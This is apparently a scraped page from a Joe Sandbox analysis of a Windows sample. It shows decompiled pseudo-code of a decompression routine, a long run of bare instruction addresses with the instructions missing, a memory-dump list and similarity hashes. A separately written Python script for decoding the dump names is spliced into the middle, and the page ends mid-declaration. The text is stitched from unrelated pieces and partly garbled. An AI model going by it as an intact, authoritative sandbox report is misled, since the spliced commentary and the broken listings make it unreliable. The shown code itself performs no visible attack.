					E0040711C(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d220, 0x40a430, 0x42db28, _t448 - 8);
					 *0x42e3a8 =  *0x42e3a8 + 1;
					__eflags =  *0x42e3a8;
					goto L22;
				}
			}
		}
		L7:
		_t423 = _t411 - 1;
		if(_t423 == 0) {
			 *_t446 = 0xb;
			goto L180;
		}
		L8:
		if(_t423 != 1) {
			goto L180;
		}
		goto L9;
	case 9:
		while(1) {
			L27:
			__eflags = __ebx - 0x20;
			if(__ebx >= 0x20) {
				break;
			}
			L25:
			__eflags =  *(__ebp - 0x34);
			if( *(__ebp - 0x34) == 0) {
				goto L182;
			}
			L26:
			__eax =  *(__ebp - 0x38);
			 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
			__ecx = __ebx;
			 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
			 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
			 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
			__ebx = __ebx + 8;
			__eflags = __ebx;
		}
		L28:
		__eax =  *(__ebp - 0x40);
		__ebx = 0;
		__eax =  *(__ebp - 0x40) & 0x0000ffff;
		 *(__ebp - 0x40) = 0;
		__eflags = __eax;
		__esi[1] = __eax;
		if(__eax == 0) {
			goto L53;
		}
		L29:
		_push(0xa);
		_pop(__eax);
		goto L54;
	case 0xa:
		L30:
		__eflags =  *(__ebp - 0x34);
		if( *(__ebp - 0x34) == 0) {
			goto L182;
		}
		L31:
		__eax =  *(__ebp - 0x2c);
		__eflags = __eax;
		if(__eax != 0) {
			L48:
			__eflags = __eax -  *(__ebp - 0x34);
			if(__eax >=  *(__ebp - 0x34)) {
				__eax =  *(__ebp - 0x34);
			}
			__ecx = __esi[1];
			__eflags = __ecx - __eax;
			__edi = __ecx;
			if(__ecx >= __eax) {
				__edi = __eax;
			}
			__eax = E00405C4B( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
			 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
			 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
			 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
			 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
			_t80 =  &(__esi[1]);
			 *_t80 = __esi[1] - __edi;
			__eflags =  *_t80;
			if( *_t80 == 0) {
				L53:
				__eax = __esi[0x145];
				L54:
				 *__esi = __eax;
			}
			goto L180;
		}
		L32:
		__ecx = __esi[0x26e8];
		__edx =  *(__ebp - 0x30);
		__eflags = __edx - __ecx;
		if(__edx != __ecx) {
			L38:
			__esi[0x26ea] = __edx;
			__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
			__edx = __esi[0x26ea];
			__ecx = __esi[0x26e9];
			__eflags = __edx - __ecx;
			 *(__ebp - 0x30) = __edx;
			if(__edx >= __ecx) {
				__eax = __esi[0x26e8];
				__eax = __esi[0x26e8] - __edx;
				__eflags = __eax;
			} else {
				__ecx = __ecx - __edx;
				__eax = __ecx - __edx - 1;
			}
			__edi = __esi[0x26e8];
                                                                        												 *(__ebp - 0x2c) = __eax;
                                                                        												__eflags = __edx - __edi;
                                                                        												if(__edx == __edi) {
                                                                        													__edx =  &(__esi[0x6e8]);
                                                                        													__eflags = __edx - __ecx;
                                                                        													if(__eflags != 0) {
                                                                        														 *(__ebp - 0x30) = __edx;
                                                                        														if(__eflags >= 0) {
                                                                        															__edi = __edi - __edx;
                                                                        															__eflags = __edi;
                                                                        															__eax = __edi;
                                                                        														} else {
                                                                        															__ecx = __ecx - __edx;
                                                                        															__eax = __ecx;
                                                                        														}
                                                                        														 *(__ebp - 0x2c) = __eax;
                                                                        													}
                                                                        												}
                                                                        												__eflags = __eax;
                                                                        												if(__eax == 0) {
                                                                        													goto L183;
                                                                        												} else {
                                                                        													goto L48;
                                                                        												}
                                                                        											}
                                                                        											L33:
                                                                        											__eax = __esi[0x26e9];
                                                                        											__edi =  &(__esi[0x6e8]);
                                                                        											__eflags = __eax - __edi;
                                                                        											if(__eax == __edi) {
                                                                        												goto L38;
                                                                        											}
                                                                        											L34:
                                                                        											__edx = __edi;
                                                                        											__eflags = __edx - __eax;
                                                                        											 *(__ebp - 0x30) = __edx;
                                                                        											if(__edx >= __eax) {
                                                                        												__ecx = __ecx - __edx;
                                                                        												__eflags = __ecx;
                                                                        												__eax = __ecx;
                                                                        											} else {
                                                                        												__eax = __eax - __edx;
                                                                        												__eax = __eax - 1;
                                                                        											}
                                                                        											__eflags = __eax;
                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                        											if(__eax != 0) {
                                                                        												goto L48;
                                                                        											} else {
                                                                        												goto L38;
                                                                        											}
                                                                        										case 0xb:
                                                                        											goto L56;
                                                                        										case 0xc:
                                                                        											L60:
                                                                        											__esi[1] = __esi[1] >> 0xa;
                                                                        											__eax = (__esi[1] >> 0xa) + 4;
                                                                        											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                        												goto L68;
                                                                        											}
                                                                        											goto L61;
                                                                        										case 0xd:
                                                                        											while(1) {
                                                                        												L93:
                                                                        												__eax = __esi[1];
                                                                        												__ecx = __esi[2];
                                                                        												__edx = __eax;
                                                                        												__eax = __eax & 0x0000001f;
                                                                        												__edx = __edx >> 5;
                                                                        												__eax = __edx + __eax + 0x102;
                                                                        												__eflags = __esi[2] - __eax;
                                                                        												if(__esi[2] >= __eax) {
                                                                        													break;
                                                                        												}
                                                                        												L73:
                                                                        												__eax = __esi[0x143];
                                                                        												while(1) {
                                                                        													L76:
                                                                        													__eflags = __ebx - __eax;
                                                                        													if(__ebx >= __eax) {
                                                                        														break;
                                                                        													}
                                                                        													L74:
                                                                        													__eflags =  *(__ebp - 0x34);
                                                                        													if( *(__ebp - 0x34) == 0) {
                                                                        														goto L182;
                                                                        													}
                                                                        													L75:
                                                                        													__ecx =  *(__ebp - 0x38);
                                                                        													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                        													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                        													__ecx = __ebx;
                                                                        													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                        													__ebx = __ebx + 8;
                                                                        													__eflags = __ebx;
                                                                        												}
                                                                        												L77:
                                                                        												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                                        												__eax = __eax &  *(__ebp - 0x40);
                                                                        												__ecx = __esi[0x144];
                                                                        												__eax = __esi[0x144] + __eax * 4;
                                                                        												__edx =  *(__eax + 1) & 0x000000ff;
                                                                        												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                        												__eflags = __eax - 0x10;
                                                                        												 *(__ebp - 0x14) = __eax;
                                                                        												if(__eax >= 0x10) {
                                                                        													L79:
                                                                        													__eflags = __eax - 0x12;
                                                                        													if(__eax != 0x12) {
                                                                        														__eax = __eax + 0xfffffff2;
                                                                        														 *(__ebp - 8) = 3;
                                                                        													} else {
                                                                        														_push(7);
                                                                        														 *(__ebp - 8) = 0xb;
                                                                        														_pop(__eax);
                                                                        													}
                                                                        													while(1) {
                                                                        														L84:
                                                                        														__ecx = __eax + __edx;
                                                                        														__eflags = __ebx - __eax + __edx;
                                                                        														if(__ebx >= __eax + __edx) {
                                                                        															break;
                                                                        														}
                                                                        														L82:
                                                                        														__eflags =  *(__ebp - 0x34);
                                                                        														if( *(__ebp - 0x34) == 0) {
                                                                        															goto L182;
                                                                        														}
                                                                        														L83:
                                                                        														__ecx =  *(__ebp - 0x38);
                                                                        														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                        														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                        														__ecx = __ebx;
                                                                        														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                        														__ebx = __ebx + 8;
                                                                        														__eflags = __ebx;
                                                                        													}
                                                                        													L85:
                                                                        													__ecx = __edx;
                                                                        													__ebx = __ebx - __edx;
                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                        													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                        													__edx =  *(__ebp - 8);
                                                                        													__ebx = __ebx - __eax;
                                                                        													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                        													__ecx = __eax;
                                                                        													__eax = __esi[1];
                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                        													__ecx = __esi[2];
                                                                        													__eax = __eax >> 5;
                                                                        													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                        													__eax = __eax & 0x0000001f;
                                                                        													__eax = __edi + __eax + 0x102;
                                                                        													__edi = __edx + __ecx;
                                                                        													__eflags = __edx + __ecx - __eax;
                                                                        													if(__edx + __ecx > __eax) {
                                                                        														goto L9;
                                                                        													}
                                                                        													L86:
                                                                        													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                        													if( *(__ebp - 0x14) != 0x10) {
                                                                        														L89:
                                                                        														__edi = 0;
                                                                        														__eflags = 0;
                                                                        														L90:
                                                                        														__eax = __esi + 0xc + __ecx * 4;
                                                                        														do {
                                                                        															L91:
                                                                        															 *__eax = __edi;
                                                                        															__ecx = __ecx + 1;
                                                                        															__eax = __eax + 4;
                                                                        															__edx = __edx - 1;
                                                                        															__eflags = __edx;
                                                                        														} while (__edx != 0);
                                                                        														__esi[2] = __ecx;
                                                                        														continue;
                                                                        													}
                                                                        													L87:
                                                                        													__eflags = __ecx - 1;
                                                                        													if(__ecx < 1) {
                                                                        														goto L9;
                                                                        													}
                                                                        													L88:
                                                                        													__edi =  *(__esi + 8 + __ecx * 4);
                                                                        													goto L90;
                                                                        												}
                                                                        												L78:
                                                                        												__ecx = __edx;
                                                                        												__ebx = __ebx - __edx;
                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                        												__ecx = __esi[2];
                                                                        												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                        												__esi[2] = __esi[2] + 1;
                                                                        											}
                                                                        											L94:
                                                                        											__eax = __esi[1];
                                                                        											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                        											__edi = __eax;
                                                                        											__eax = __eax >> 5;
                                                                        											__edi = __edi & 0x0000001f;
                                                                        											__ecx = 0x101;
                                                                        											__eax = __eax & 0x0000001f;
                                                                        											__edi = __edi + 0x101;
                                                                        											__eax = __eax + 1;
                                                                        											__edx = __ebp - 0xc;
                                                                        											 *(__ebp - 0x14) = __eax;
                                                                        											 &(__esi[0x148]) = __ebp - 4;
                                                                        											 *(__ebp - 4) = 9;
                                                                        											__ebp - 0x18 =  &(__esi[3]);
                                                                        											 *(__ebp - 0x10) = 6;
                                                                        											__eax = E0040711C( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                        											__eflags =  *(__ebp - 4);
                                                                        											if( *(__ebp - 4) == 0) {
                                                                        												__eax = __eax | 0xffffffff;
                                                                        												__eflags = __eax;
                                                                        											}
                                                                        											__eflags = __eax;
                                                                        											if(__eax != 0) {
                                                                        												goto L9;
                                                                        											} else {
                                                                        												L97:
                                                                        												__ebp - 0xc =  &(__esi[0x148]);
                                                                        												__ebp - 0x10 = __ebp - 0x1c;
                                                                        												__eax = __esi + 0xc + __edi * 4;
                                                                        												__eax = E0040711C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                        												__eflags = __eax;
                                                                        												if(__eax != 0) {
                                                                        													goto L9;
                                                                        												}
                                                                        												L98:
                                                                        												__eax =  *(__ebp - 0x10);
                                                                        												__eflags =  *(__ebp - 0x10);
                                                                        												if( *(__ebp - 0x10) != 0) {
                                                                        													L100:
                                                                        													__cl =  *(__ebp - 4);
                                                                        													 *__esi =  *__esi & 0x00000000;
                                                                        													__eflags =  *__esi;
                                                                        													__esi[4] = __al;
                                                                        													__eax =  *(__ebp - 0x18);
                                                                        													__esi[5] =  *(__ebp - 0x18);
                                                                        													__eax =  *(__ebp - 0x1c);
                                                                        													__esi[4] = __cl;
                                                                        													__esi[6] =  *(__ebp - 0x1c);
                                                                        													goto L101;
                                                                        												}
                                                                        												L99:
                                                                        												__eflags = __edi - 0x101;
                                                                        												if(__edi > 0x101) {
                                                                        													goto L9;
                                                                        												}
                                                                        												goto L100;
                                                                        											}
                                                                        										case 0xe:
                                                                        											goto L9;
                                                                        										case 0xf:
                                                                        											L175:
                                                                        											__eax =  *(__ebp - 0x30);
                                                                        											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                        											__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                                        											__ecx = __esi[0x26ea];
                                                                        											__edx = __esi[0x26e9];
                                                                        											__eflags = __ecx - __edx;
                                                                        											 *(__ebp - 0x30) = __ecx;
                                                                        											if(__ecx >= __edx) {
                                                                        												__eax = __esi[0x26e8];
                                                                        												__eax = __esi[0x26e8] - __ecx;
                                                                        												__eflags = __eax;
                                                                        											} else {
                                                                        												__edx = __edx - __ecx;
                                                                        												__eax = __edx - __ecx - 1;
                                                                        											}
                                                                        											__eflags = __ecx - __edx;
                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                        											if(__ecx != __edx) {
                                                                        												L183:
                                                                        												__edi = 0;
                                                                        												goto L10;
                                                                        											} else {
                                                                        												L179:
                                                                        												__eax = __esi[0x145];
                                                                        												__eflags = __eax - 8;
                                                                        												 *__esi = __eax;
                                                                        												if(__eax != 8) {
                                                                        													L184:
                                                                        													0 = 1;
                                                                        													goto L10;
                                                                        												}
                                                                        												goto L180;
                                                                        											}
                                                                        									}
                                                                        								}
                                                                        								L181:
                                                                        								goto L9;
                                                                        							}
                                                                        							L70:
                                                                        							if( *__edi == __eax) {
                                                                        								goto L72;
                                                                        							}
                                                                        							L71:
                                                                        							__esi[2] = __esi[2] & __eax;
                                                                        							 *__esi = 0xd;
                                                                        							goto L93;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L182:
                                                                        				_t443 = 0;
                                                                        				_t446[0x147] =  *(_t448 - 0x40);
                                                                        				_t446[0x146] = _t425;
                                                                        				( *(_t448 + 8))[1] = 0;
                                                                        				goto L11;
                                                                        			}
                                                                        0x00406ef7
                                                                        0x00406ef7
                                                                        0x00406eed
                                                                        0x00406eed
                                                                        0x00406ef0
                                                                        0x00406ef0
                                                                        0x00406eeb
                                                                        0x00406ee2
                                                                        0x00406ef9
                                                                        0x00406efb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406efb
                                                                        0x00406e7a
                                                                        0x00406e7a
                                                                        0x00406e80
                                                                        0x00406e86
                                                                        0x00406e88
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406e8a
                                                                        0x00406e8a
                                                                        0x00406e8c
                                                                        0x00406e8e
                                                                        0x00406e97
                                                                        0x00406e97
                                                                        0x00406e90
                                                                        0x00406e90
                                                                        0x00406e93
                                                                        0x00406e93
                                                                        0x00406e99
                                                                        0x00406e9b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f01
                                                                        0x00406f01
                                                                        0x00406f06
                                                                        0x00406f08
                                                                        0x00406f09
                                                                        0x00406f0a
                                                                        0x00406f0b
                                                                        0x00406f11
                                                                        0x00406f14
                                                                        0x00406f17
                                                                        0x00406f1a
                                                                        0x00406f1c
                                                                        0x00406f22
                                                                        0x00406f22
                                                                        0x00406f25
                                                                        0x00406f25
                                                                        0x00406f25
                                                                        0x00406f25
                                                                        0x00406f2e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f33
                                                                        0x00406f33
                                                                        0x00406f36
                                                                        0x00406f39
                                                                        0x00406f3b
                                                                        0x00406fd2
                                                                        0x00406fd2
                                                                        0x00406fd5
                                                                        0x00406fd7
                                                                        0x00406fd8
                                                                        0x00406fd9
                                                                        0x00406fdc
                                                                        0x00000000
                                                                        0x00406fdc
                                                                        0x00406f41
                                                                        0x00406f41
                                                                        0x00406f47
                                                                        0x00406f49
                                                                        0x00406f6e
                                                                        0x00406f71
                                                                        0x00406f77
                                                                        0x00406f7c
                                                                        0x00406f82
                                                                        0x00406f88
                                                                        0x00406f8a
                                                                        0x00406f8d
                                                                        0x00406f96
                                                                        0x00406f9c
                                                                        0x00406f9c
                                                                        0x00406f8f
                                                                        0x00406f91
                                                                        0x00406f93
                                                                        0x00406f93
                                                                        0x00406f9e
                                                                        0x00406fa4
                                                                        0x00406fa6
                                                                        0x00406fa9
                                                                        0x00406fab
                                                                        0x00406fb1
                                                                        0x00406fb3
                                                                        0x00406fb5
                                                                        0x00406fb7
                                                                        0x00406fb9
                                                                        0x00406fbc
                                                                        0x00406fc5
                                                                        0x00406fc8
                                                                        0x00406fc8
                                                                        0x00406fbe
                                                                        0x00406fbe
                                                                        0x00406fc1
                                                                        0x00406fc1
                                                                        0x00406fbc
                                                                        0x00406fb3
                                                                        0x00406fca
                                                                        0x00406fcc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406fcc
                                                                        0x00406f4b
                                                                        0x00406f4b
                                                                        0x00406f51
                                                                        0x00406f57
                                                                        0x00406f59
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f5b
                                                                        0x00406f5b
                                                                        0x00406f5d
                                                                        0x00406f5f
                                                                        0x00406f66
                                                                        0x00406f66
                                                                        0x00406f68
                                                                        0x00406f61
                                                                        0x00406f61
                                                                        0x00406f63
                                                                        0x00406f63
                                                                        0x00406f6a
                                                                        0x00406f6c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406fe4
                                                                        0x00406fe4
                                                                        0x00406fe7
                                                                        0x00406fe9
                                                                        0x00406fec
                                                                        0x00406fef
                                                                        0x00406fef
                                                                        0x00406fef
                                                                        0x00406fef
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040669d
                                                                        0x00406681
                                                                        0x00000000
                                                                        0x00406687
                                                                        0x0040668a
                                                                        0x00406694
                                                                        0x00406697
                                                                        0x0040669a
                                                                        0x00000000
                                                                        0x0040669a
                                                                        0x00406681
                                                                        0x004066a5
                                                                        0x004066a8
                                                                        0x004066ac
                                                                        0x004066b6
                                                                        0x004066c0
                                                                        0x004066c3
                                                                        0x004066c9
                                                                        0x004067fd
                                                                        0x004067ff
                                                                        0x00406805
                                                                        0x00406808
                                                                        0x0040680b
                                                                        0x00000000
                                                                        0x0040680b
                                                                        0x004066cf
                                                                        0x004066cf
                                                                        0x004066d0
                                                                        0x00406728
                                                                        0x00406728
                                                                        0x0040672f
                                                                        0x004067d5
                                                                        0x004067d5
                                                                        0x004067da
                                                                        0x004067dd
                                                                        0x004067e2
                                                                        0x004067e5
                                                                        0x004067ea
                                                                        0x004067ed
                                                                        0x004067f2
                                                                        0x004067f5
                                                                        0x004067f5
                                                                        0x00000000
                                                                        0x00406735
                                                                        0x00406735
                                                                        0x00406735
                                                                        0x00406735
                                                                        0x00406739
                                                                        0x00406739
                                                                        0x0040675b
                                                                        0x0040675e
                                                                        0x00406760
                                                                        0x00406763
                                                                        0x00406768
                                                                        0x0040673e
                                                                        0x0040673e
                                                                        0x00406743
                                                                        0x00406745
                                                                        0x00406747
                                                                        0x0040674c
                                                                        0x00406752
                                                                        0x00406757
                                                                        0x00406759
                                                                        0x00406759
                                                                        0x0040674e
                                                                        0x0040674e
                                                                        0x0040674e
                                                                        0x0040674c
                                                                        0x00000000
                                                                        0x0040676a
                                                                        0x00406797
                                                                        0x0040679c
                                                                        0x0040679e
                                                                        0x0040679f
                                                                        0x004067a1
                                                                        0x004067a2
                                                                        0x004067a2
                                                                        0x004067a2
                                                                        0x004067ca
                                                                        0x004067cf
                                                                        0x004067cf
                                                                        0x00000000
                                                                        0x004067cf
                                                                        0x00406768
                                                                        0x0040672f
                                                                        0x004066d2
                                                                        0x004066d2
                                                                        0x004066d3
                                                                        0x0040671d
                                                                        0x00000000
                                                                        0x0040671d
                                                                        0x004066d5
                                                                        0x004066d6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406832
                                                                        0x00406832
                                                                        0x00406832
                                                                        0x00406835
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406812
                                                                        0x00406812
                                                                        0x00406816
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040681c
                                                                        0x0040681c
                                                                        0x0040681f
                                                                        0x00406822
                                                                        0x00406827
                                                                        0x00406829
                                                                        0x0040682c
                                                                        0x0040682f
                                                                        0x0040682f
                                                                        0x0040682f
                                                                        0x00406837
                                                                        0x00406837
                                                                        0x0040683a
                                                                        0x0040683c
                                                                        0x00406841
                                                                        0x00406844
                                                                        0x00406846
                                                                        0x00406849
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040684f
                                                                        0x0040684f
                                                                        0x00406851
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406857
                                                                        0x00406857
                                                                        0x0040685b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406861
                                                                        0x00406861
                                                                        0x00406864
                                                                        0x00406866
                                                                        0x00406904
                                                                        0x00406904
                                                                        0x00406907
                                                                        0x00406909
                                                                        0x00406909
                                                                        0x0040690c
                                                                        0x0040690f
                                                                        0x00406911
                                                                        0x00406913
                                                                        0x00406915
                                                                        0x00406915
                                                                        0x0040691e
                                                                        0x00406923
                                                                        0x00406926
                                                                        0x00406929
                                                                        0x0040692c
                                                                        0x0040692f
                                                                        0x0040692f
                                                                        0x0040692f
                                                                        0x00406932
                                                                        0x00406938
                                                                        0x00406938
                                                                        0x0040693e
                                                                        0x0040693e
                                                                        0x0040693e
                                                                        0x00000000
                                                                        0x00406932
                                                                        0x0040686c
                                                                        0x0040686c
                                                                        0x00406872
                                                                        0x00406875
                                                                        0x00406877
                                                                        0x004068a2
                                                                        0x004068a5
                                                                        0x004068ab
                                                                        0x004068b0
                                                                        0x004068b6
                                                                        0x004068bc
                                                                        0x004068be
                                                                        0x004068c1
[Disassembly listing: only the instruction-address column survived extraction (addresses 0x00406676 through 0x0040706e; 0x00000000 entries are rows that carried no address). The instruction text for these rows is not on the page.]

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
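The dump names above encode where each region was taken from and how it was mapped. The following script is an added example, not part of the Joe Sandbox report: it splits the names into their fields, decodes the fifth field as a winnt.h PAGE_* protection value, and picks the dump that contains a given virtual address such as the decompiled function E0040711C. The field layout (pid.run.id.base.protection.type.sdmp, hexadecimal apart from the id) is inferred from the names on this page rather than taken from vendor documentation, the sixth field is kept raw because its meaning is not stated here, and the rule that a dump extends up to the next dump's base is an assumption made because the names carry no size.

```python
"""Decode Joe Sandbox memory-dump (.sdmp) names from a "Memory Dump Source" block.

Added example, not code from the report. The field layout below is inferred
from the names on the page (assumption): <pid>.<run>.<id>.<base VA>.<protection>.<type>.sdmp
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# PAGE_* memory-protection constants from winnt.h.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Assumed layout; the <id> field is digits only in every name on the page.
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9a-fA-F]{8})\.(?P<run>[0-9a-fA-F]{8})\.(?P<id>\d+)\."
    r"(?P<base>[0-9a-fA-F]{16})\.(?P<prot>[0-9a-fA-F]{8})\.(?P<kind>[0-9a-fA-F]{8})\.sdmp$"
)


@dataclass
class Dump:
    name: str
    pid: int
    base: int        # virtual address the region was dumped from
    protection: int  # raw protection value; PAGE_GUARD/PAGE_NOCACHE bits masked off when naming
    kind: int        # sixth field, kept raw: its meaning is not stated on the page

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection & 0xFF, f"0x{self.protection:x}")

    @property
    def executable(self) -> bool:
        # PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY
        return (self.protection & 0xF0) != 0


def parse_sdmp_name(name: str) -> Dump:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not an .sdmp name in the assumed layout: {name}")
    return Dump(
        name=name,
        pid=int(m["pid"], 16),
        base=int(m["base"], 16),
        protection=int(m["prot"], 16),
        kind=int(m["kind"], 16),
    )


def dump_for_va(dumps: List[Dump], va: int) -> Optional[Dump]:
    """Return the dump whose base is the highest one not above `va`.

    Assumption: each dump covers [base, next dump's base); the names give no size.
    """
    candidates = [d for d in dumps if d.base <= va]
    return max(candidates, key=lambda d: d.base) if candidates else None


def rva(va: int, image_base: int = 0x00400000) -> int:
    """RVA of `va` for an image loaded at `image_base` (the report's "Offset: 00400000")."""
    if va < image_base:
        raise ValueError("address below image base")
    return va - image_base


def executable_dumps(dumps: List[Dump]) -> List[Dump]:
    """The dumps worth loading into a disassembler: those with an execute protection."""
    return [d for d in dumps if d.executable]


# Dump names copied from the "Memory Dump Source" block of this report.
REPORT_DUMP_NAMES = [
    "00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp",
    "00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp",
    "00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp",
    "00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp",
    "00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp",
    "00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp",
    "00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp",
    "00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp",
]
REPORT_DUMPS = [parse_sdmp_name(n) for n in REPORT_DUMP_NAMES]


if __name__ == "__main__":
    for d in REPORT_DUMPS:
        print(f"{d.base:#010x}  {d.protection_name:<24} {d.name}")
    func_va = 0x0040711C  # the decompiled function E0040711C shown below
    hit = dump_for_va(REPORT_DUMPS, func_va)
    print(f"E{func_va:08X} is in {hit.name} (RVA {rva(func_va):#x}, {hit.protection_name})")
```

Run against the eight names above, the only dump with an execute protection is the one based at 0x401000 (PAGE_EXECUTE_READ), which is also the one the report lists as the source file for the decompiled code; the dumps at 0x40A000 onward decode as PAGE_READWRITE and are the writable data regions, which is where the configuration and unpacked payload of a sample like this would normally be looked for rather than in the code dump.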
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                        • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                                        • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                        • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040711C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                        				signed int _v8;
                                                                        				unsigned int _v12;
                                                                        				signed int _v16;
                                                                        				intOrPtr _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				intOrPtr* _v32;
                                                                        				signed int* _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				void _v116;
                                                                        				signed int _v176;
                                                                        				signed int _v180;
                                                                        				signed int _v240;
                                                                        				signed int _t166;
                                                                        				signed int _t168;
                                                                        				intOrPtr _t175;
                                                                        				signed int _t181;
                                                                        				void* _t182;
                                                                        				intOrPtr _t183;
                                                                        				signed int* _t184;
                                                                        				signed int _t186;
